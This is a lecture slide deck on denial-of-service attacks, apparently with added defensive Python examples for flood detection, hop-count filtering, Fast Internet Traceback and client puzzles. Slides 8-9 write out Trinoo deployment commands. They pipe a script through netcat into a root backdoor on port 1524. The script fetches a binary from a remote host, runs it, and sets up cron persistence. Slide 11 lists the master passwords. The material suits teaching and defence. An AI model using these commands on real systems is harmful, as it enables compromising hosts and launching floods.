Network Security: CIA + Availability, by Jinjian Ma (PowerPoint PPT presentation)

SLIDE 1

Network Security

CIA + Availability

By Jinjian Ma

SLIDE 2

Topics

  • DOS/DDoS
  • Detection & Defense
  • Prevention

SLIDE 3

DOS/DDoS Types

  • Vulnerability attack
  • Flooding attack

SLIDE 4

DoS vs DDoS

DoS:

  • The attack is launched from a single host
  • Less powerful

DDoS:

  • Two components: agents and handlers
  • Hard to defend against

SLIDE 5

DDoS step by step

  1. The attacker has some knowledge of a program/system flaw
  2. Scan the network and build a list of compromised hosts
  3. Select the desired architecture
  4. Distribute the agents; optionally, hide the agent process
  5. Launch the attack

SLIDE 6

Real-life example: Trinoo (1999)

  • An easy-to-use DDoS tool
  • Free download
  • A network of masters and daemons

SLIDE 7

Trinoo Deployment

Attacker: "I will exploit TCP port 1524 to do something evil."

  • The Ingreslock backdoor uses port 1524; a telnet to it gives a root shell
  • nmap scan of port 1524

SLIDE 8

Trinoo Deployment

Compromised hosts found by the scan: A.A.A.A, B.B.B.B, C.C.C.C, D.D.D.D

The script is piped into each host's backdoor port:

    ./trin.sh | nc A.A.A.A 1524 &
    ./trin.sh | nc B.B.B.B 1524 &
    ./trin.sh | nc C.C.C.C 1524 &
    ./trin.sh | nc D.D.D.D 1524 &

Note: you can imagine nc does almost the same thing as telnet

SLIDE 9

trin.sh

The script only prints the commands that the nc session then feeds to the backdoor shell on each compromised host:

    echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
    echo "echo rcp is done moving binary"
    echo "chmod +x /usr/sbin/rpc.listen"
    echo "echo launching trinoo"
    echo "/usr/sbin/rpc.listen"
    echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
    echo "crontab cron"
    echo "echo launched"
    echo "exit"

SLIDE 10

Trinoo Network

Diagram: attacker → masters (master, master, master, …) → daemons (daemon, daemon, …) → victim

  • The attacker uses telnet to interact with a master
  • Masters send messages to the daemons
  • Daemons listen on a port and are connected to a master
  • The daemons' message flood hits the victim

SLIDE 11

Attack using Trinoo

  1. Prepare the daemons on the compromised hosts
  2. Launch the masters and enter the password (gOrave)
  3. Telnet to the masters and enter the password (betaalmostdone)
  4. Now you can control a DDoS attack:

  • Control the packet size
  • Decide the attack duration
  • Stop/start the attack

SLIDE 12

Attack using Trinoo

  • Show active daemons
  • Launch an attack

SLIDE 13

Attack using Trinoo

SLIDE 14

Daemon Source code

SLIDE 15

Based on DDoS…

  • ICMP smurf flooding: forge the ICMP echo request's source address to be the victim's, so every reply goes to the victim
  • TCP SYN flooding
  • UDP flooding
  • …
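
As an added example (not part of the slides), the three flood types listed above can be told apart in traffic the defender already sees. The detector below runs over constructed packet records and flags a SYN flood (many SYNs to one port that are never completed), a smurf burst (ICMP echo replies converging on one host from a whole amplifier subnet) and a UDP flood (datagram rate to one host). The record format, the addresses and the per-second thresholds are assumptions made for the sample.

```python
from collections import defaultdict

# Per-second thresholds, chosen for the constructed sample below; a real
# deployment tunes them to the link's normal baseline.
SYN_HALF_OPEN_THRESHOLD = 50
SMURF_SOURCES_THRESHOLD = 30
UDP_PACKETS_THRESHOLD = 100


def detect_floods(packets):
    """Scan packet records and return (kind, dst, dport, count) alerts.

    A record is a dict with ts (seconds), proto ('tcp', 'udp' or 'icmp'),
    src and dst; tcp records carry dport and flags ('S' SYN, 'A' ACK) and
    icmp records carry type (0 = echo reply).  Counters are kept per
    one-second window so a short burst is not averaged away.
    """
    syns = defaultdict(int)        # (sec, dst, dport) -> pure SYNs
    acks = defaultdict(int)        # (sec, dst, dport) -> ACKs that complete a handshake
    reply_srcs = defaultdict(set)  # (sec, dst) -> distinct echo-reply sources
    udp = defaultdict(int)         # (sec, dst) -> UDP datagrams
    for p in packets:
        sec = int(p["ts"])
        if p["proto"] == "tcp":
            key = (sec, p["dst"], p["dport"])
            if "S" in p["flags"] and "A" not in p["flags"]:
                syns[key] += 1
            elif "A" in p["flags"]:
                acks[key] += 1
        elif p["proto"] == "icmp" and p["type"] == 0:
            reply_srcs[(sec, p["dst"])].add(p["src"])
        elif p["proto"] == "udp":
            udp[(sec, p["dst"])] += 1

    alerts = []
    for (sec, dst, dport), n in syns.items():
        half_open = n - acks.get((sec, dst, dport), 0)   # SYNs nobody followed up
        if half_open > SYN_HALF_OPEN_THRESHOLD:
            alerts.append(("syn_flood", dst, dport, half_open))
    for (sec, dst), srcs in reply_srcs.items():
        # smurf: every host on the amplifier's broadcast network answers, so
        # many distinct sources aim echo replies at the forged victim address
        if len(srcs) > SMURF_SOURCES_THRESHOLD:
            alerts.append(("smurf", dst, None, len(srcs)))
    for (sec, dst), n in udp.items():
        if n > UDP_PACKETS_THRESHOLD:
            alerts.append(("udp_flood", dst, None, n))
    return alerts


def sample_traffic():
    """Constructed records: normal web traffic in second 0, then one flood per second."""
    pk = []
    for i in range(20):   # 20 legitimate clients complete their handshakes
        pk.append({"ts": 0.1, "proto": "tcp", "src": f"10.0.{i}.1",
                   "dst": "203.0.113.10", "dport": 80, "flags": "S"})
        pk.append({"ts": 0.3, "proto": "tcp", "src": f"10.0.{i}.1",
                   "dst": "203.0.113.10", "dport": 80, "flags": "A"})
    for i in range(200):  # SYN flood: forged sources, nothing ever completes
        pk.append({"ts": 1.0 + i / 1000, "proto": "tcp", "src": f"198.51.100.{i % 250}",
                   "dst": "203.0.113.10", "dport": 80, "flags": "S"})
    for i in range(1, 255):  # smurf: a whole /24 of amplifiers replies to the victim
        pk.append({"ts": 2.0, "proto": "icmp", "type": 0,
                   "src": f"192.0.2.{i}", "dst": "203.0.113.10"})
    for i in range(300):  # UDP flood at the DNS server
        pk.append({"ts": 3.0 + i / 1000, "proto": "udp",
                   "src": "198.51.100.9", "dst": "203.0.113.53"})
    return pk


if __name__ == "__main__":
    for kind, dst, dport, count in detect_floods(sample_traffic()):
        print(kind, dst, dport, count)
```

The SYN check counts half-open handshakes rather than raw SYNs, so a busy but healthy server (second 0 in the sample) does not trip it; the smurf check keys on the number of distinct reply sources, because one forged request to a broadcast address yields one reply per amplifier host.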

SLIDE 16

Detection & Defense

  • Hop-count
  • IP traceback
  • Intrusion Detection Systems (IDS)

SLIDE 17

When is hop-count useful?

Attackers want to:

  1. conceal the flooding sources and the localities of the flooding traffic
  2. coax uncompromised hosts into becoming reflectors

Idea:

  1. Modern OSs use a few selected initial TTLs, typically 30, 32, 60, 64, 128 or 255, so the hop count of a packet can be estimated from the TTL it arrives with
  2. Maintain an IP-to-hop-count map table and compare each packet against it

SLIDE 18

Hop-count

Pros:

  • Easy to implement, using the existing TTL field
  • Effective against IP spoofing

Cons:

  • Forged packets that have the same hop-count as the zombies are not caught
  • Attacks which do not spoof the IP address
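
The table-driven check described on the two hop-count slides, written out as an added example (not code from the slides): the victim infers each packet's initial TTL from the short list of OS defaults, derives a hop count, and compares it with the learned IP-to-hop-count map. The table, addresses and TTL values are constructed for the sample, and the fifth packet shows the con listed above, a forgery whose hop count happens to match the real host and therefore passes.

```python
# Common initial TTL values named on the slide; each OS family picks one of these.
INITIAL_TTLS = (30, 32, 60, 64, 128, 255)


def infer_initial_ttl(observed_ttl):
    """Smallest common initial TTL at or above the observed value.

    A packet only ever loses TTL in transit, so the sender's initial TTL is
    the nearest default at or above the value we see.  Close pairs such as
    60/64 are ambiguous for paths longer than their gap; this example does not
    try to resolve that and simply takes the lower candidate.
    """
    for initial in INITIAL_TTLS:
        if observed_ttl <= initial:
            return initial
    raise ValueError("TTL cannot exceed 255")


def hop_count(observed_ttl):
    """Hops travelled = inferred initial TTL - TTL seen at the victim."""
    return infer_initial_ttl(observed_ttl) - observed_ttl


def check_packet(src_ip, observed_ttl, ip2hc):
    """Classify one packet against the IP-to-hop-count table."""
    expected = ip2hc.get(src_ip)
    if expected is None:
        return "unknown"      # never seen legitimately; policy decides (rate-limit, learn, ...)
    return "ok" if hop_count(observed_ttl) == expected else "spoofed"


def filter_packets(packets, ip2hc):
    """Run check_packet over (src, ttl) pairs and return the verdicts alongside."""
    return [(src, ttl, check_packet(src, ttl, ip2hc)) for src, ttl in packets]


# Constructed table, as it would be learned from legitimate traffic before an attack.
IP2HC = {"10.0.0.5": 12, "172.16.4.9": 7, "192.0.2.77": 20}

# Constructed packets: (source address, TTL observed at the victim).
PACKETS = [
    ("10.0.0.5", 116),     # 128 - 116 = 12 hops, matches the table
    ("172.16.4.9", 121),   # 128 - 121 = 7 hops, matches
    ("192.0.2.77", 246),   # 255 - 246 = 9 hops, table says 20: spoofed
    ("10.0.0.5", 236),     # 255 - 236 = 19 hops, table says 12: spoofed
    ("172.16.4.9", 248),   # 255 - 248 = 7 hops: a forgery whose hop count
                           #   matches the real host slips through (the slide's con)
    ("198.51.100.3", 60),  # not in the table
]

if __name__ == "__main__":
    for src, ttl, verdict in filter_packets(PACKETS, IP2HC):
        print(f"{src:>14}  ttl={ttl:3d}  hops={hop_count(ttl):2d}  {verdict}")
```

Because the check needs nothing but the TTL already in every packet and a table learned in peacetime, it is cheap enough to run per packet at the victim, which is the "easy to implement" point of the slide; the false negative on the fifth packet is the price of that simplicity.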

SLIDE 19

IP traceback

Trace back to the true attacking source

  • Router packet marking
  • Path reconstruction algorithm

Fast Internet Traceback (FIT)

SLIDE 20

Fast Internet Traceback

Figure: the TTL byte, with its 6th bit highlighted and C (a global constant) in the low bits

SLIDE 21

Fast Internet Traceback

A FIT-implemented router sits on the path. Hop by hop, the packet's ID field and TTL look like this:

    ID: 0101100000000000, TTL: 255 -> 1111 1111
    ID: 0101100000000000, TTL: 254 -> 1111 1110
    ID: 0101100000000000, TTL: 253 -> 1111 1101
    ID: 111 + (4th part of IP hash), TTL: 246 -> 1111 0110   (marked by the FIT router; note the 6th bit in the TTL)
    ID: 111 + (4th part of IP hash), TTL: 245 -> 1111 0101
    ID: 111 + (4th part of IP hash), TTL: 244 -> 1111 0100
    ID: 111 + (4th part of IP hash), TTL: 243 -> 1111 0011

Victim: "This packet came from a FIT router 3 hops away from me!"

SLIDE 22

Fast Internet Traceback

At the FIT router (marking probability 0.04, C = 22):

    Original TTL: 253 -> (1111 1101)
    C = 22 -> (1 0110), written into the low 5 bits of the TTL
    New TTL: 246 -> (1111 0110)
    b: 1 (the 6th bit in the TTL after marking)

Downstream of the FIT router:

  • Observed TTL: 245
  • Observed TTL: 244
  • Observed TTL: 243

SLIDE 23

Fast Internet Traceback

  • Observed TTL: 243 --> (1111 0011)
  • C = 22 ---> (1 0110), b: 1

    d = (b|C - TTL[5:0]) mod 64
      = (1 10110 - 110011) mod 64
      = 3 mod 64
      = 3 hops away from the FIT router

The server maintains a map of IP hashes, precomputed before the attack.
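
The marking and distance computation on the three preceding slides, as an added example (not code from the slides or from the FIT authors). It replays the slides' numbers: TTL 253 at the FIT router, C = 22 written into the low 5 bits, b = 1, TTL 243 observed at the victim and d = 3. The SHA-256 hash of the router address, the three constructed router addresses, and the 16-bit ID layout (b, a 2-bit fragment index, a 13-bit hash fragment, which is my reading of the slide's "111 + 4th part of IP hash") are assumptions of the example.

```python
import hashlib

C = 22                      # global constant from the slides: 0b10110
MARKING_PROBABILITY = 0.04  # from the slides; the walkthrough forces one mark instead of sampling


def router_mark(ttl, c=C):
    """FIT router: overwrite the low 5 bits of the TTL with c.

    b is the 6th bit of the TTL after marking; the router records it so the
    victim can later undo the decrements of the routers downstream.
    """
    new_ttl = (ttl & 0xE0) | c
    b = (new_ttl >> 5) & 1
    return new_ttl, b


def forward(ttl, hops):
    """Ordinary routers only decrement the TTL, once per hop."""
    return ttl - hops


def victim_distance(observed_ttl, b, c=C):
    """Victim: d = (b|c - TTL[5:0]) mod 64, the slide's formula.

    Only the low 6 bits of the TTL take part, so the mark survives up to 63
    further hops and the mod 64 absorbs a borrow into the upper bits.
    """
    return (((b << 5) | c) - (observed_ttl & 0x3F)) % 64


def hash_fragment(router_ip, index):
    """13-bit fragment `index` (0..3) of a 52-bit hash of the router address.

    Constructed helper: the slides say only that the victim keeps a map of
    IP hashes, not which hash; SHA-256 stands in here.
    """
    digest = hashlib.sha256(router_ip.encode()).digest()
    h = int.from_bytes(digest[:7], "big") & ((1 << 52) - 1)
    return (h >> (13 * index)) & 0x1FFF


def pack_ip_id(b, index, fragment):
    """Assumed 16-bit ID layout: b, 2-bit fragment index, 13-bit fragment.
    With b = 1 and index 3 this gives the slide's '111 + 4th part of IP hash'."""
    return (b << 15) | (index << 13) | fragment


def unpack_ip_id(ip_id):
    return (ip_id >> 15) & 1, (ip_id >> 13) & 3, ip_id & 0x1FFF


def precompute_map(router_ips):
    """Victim's table, built before any attack: (index, fragment) -> router IPs."""
    table = {}
    for ip in router_ips:
        for i in range(4):
            table.setdefault((i, hash_fragment(ip, i)), []).append(ip)
    return table


def walkthrough(marking_router="203.0.113.1", hops_before=2, hops_after=3, index=3):
    """Replay the slides: TTL 255 -> 253 at the FIT router -> 246 -> 243 at the victim."""
    ttl_at_router = forward(255, hops_before)
    marked_ttl, b = router_mark(ttl_at_router)
    ip_id = pack_ip_id(b, index, hash_fragment(marking_router, index))
    observed_ttl = forward(marked_ttl, hops_after)
    # Victim side: b and the fragment come from the ID field, d from the TTL.
    b_rx, index_rx, fragment_rx = unpack_ip_id(ip_id)
    table = precompute_map([marking_router, "198.51.100.7", "192.0.2.200"])  # constructed
    return {
        "ttl_at_router": ttl_at_router,
        "marked_ttl": marked_ttl,
        "b": b,
        "observed_ttl": observed_ttl,
        "distance": victim_distance(observed_ttl, b_rx),
        "candidates": table.get((index_rx, fragment_rx), []),
    }


if __name__ == "__main__":
    print(walkthrough())
```

The mod 64 matters once the mark has been decremented past the 6th bit: a packet marked to 214 (b = 0) that travels 25 more hops arrives with low bits 111101, and 22 − 61 is negative until reduced mod 64, which gives the right answer of 25. The candidate list can hold more than one router if two addresses share a 13-bit fragment; the slides' precomputed map resolves that with the other fragments of the hash.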

SLIDE 24

Fast Internet Traceback

Pros:

  • Not every router has to be a FIT router
  • Does not violate the original design of the IP header

Cons:

  • Not effective against spoofed IP

SLIDE 25

Prevention

  • Redundant service
  • Defense using puzzles
  • Pushback

Challenge: no security policy can be globally enforced
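
One form of the "defense using puzzles" item, as an added example (not from the slides): a hash-based client puzzle. The server hands out a nonce derived from an HMAC, raises the difficulty only when its backlog grows, and verifies a solution with a single hash, while the client has to spend roughly 2^difficulty hashes to find one; that asymmetry is what makes a cheap request flood expensive for its sender. The server secret, the epoch counter, the load policy in choose_difficulty and the 16-byte nonce size are assumptions of the example.

```python
import hashlib
import hmac


def choose_difficulty(pending_requests, capacity):
    """Server policy (constructed): no puzzle while the backlog is under half
    of capacity, then about one more bit of client work per doubling of the
    overload, capped so honest clients are never asked for more than 2**24."""
    if pending_requests < capacity // 2:
        return 0
    overload = max(1, pending_requests // (capacity // 2))
    return min(24, 8 + overload.bit_length() - 1)


def issue_puzzle(server_secret, client_id, epoch, difficulty):
    """Server: derive the nonce with an HMAC over the client's identity and a
    rotating epoch, so no per-client state is allocated before the client has
    done its work and an old solution cannot be replayed into a later epoch."""
    msg = f"{client_id}|{epoch}".encode()
    nonce = hmac.new(server_secret, msg, "sha256").digest()[:16]
    return nonce, difficulty


def leading_zero_bits(data):
    """Number of zero bits at the start of a byte string."""
    bits = 0
    for byte in data:
        if byte == 0:
            bits += 8
            continue
        bits += 8 - byte.bit_length()
        break
    return bits


def solve_puzzle(nonce, difficulty, max_tries=1 << 22):
    """Client: find x with SHA-256(nonce || x) starting with `difficulty` zero
    bits. Expected cost is about 2**difficulty hashes, so the work grows
    exponentially with the difficulty the server picked."""
    for x in range(max_tries):
        digest = hashlib.sha256(nonce + x.to_bytes(8, "big")).digest()
        if leading_zero_bits(digest) >= difficulty:
            return x
    return None


def verify_solution(server_secret, client_id, epoch, difficulty, x):
    """Server: recompute the nonce and check with one HMAC and one hash,
    whatever the difficulty; verification stays cheap while solving is not."""
    nonce, _ = issue_puzzle(server_secret, client_id, epoch, difficulty)
    digest = hashlib.sha256(nonce + x.to_bytes(8, "big")).digest()
    return leading_zero_bits(digest) >= difficulty


if __name__ == "__main__":
    secret = b"constructed-server-secret"
    k = choose_difficulty(pending_requests=400, capacity=100)
    nonce, k = issue_puzzle(secret, "client-a", epoch=1, difficulty=k)
    x = solve_puzzle(nonce, k)
    print(k, x, verify_solution(secret, "client-a", 1, k, x))
```

Two design points carry the defensive value: the server stores nothing until a valid solution arrives (the nonce is recomputed from the HMAC, not looked up), and the difficulty is zero under normal load, so the puzzle costs legitimate users nothing until the backlog the slide calls a flood actually appears.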

SLIDE 26

Questions?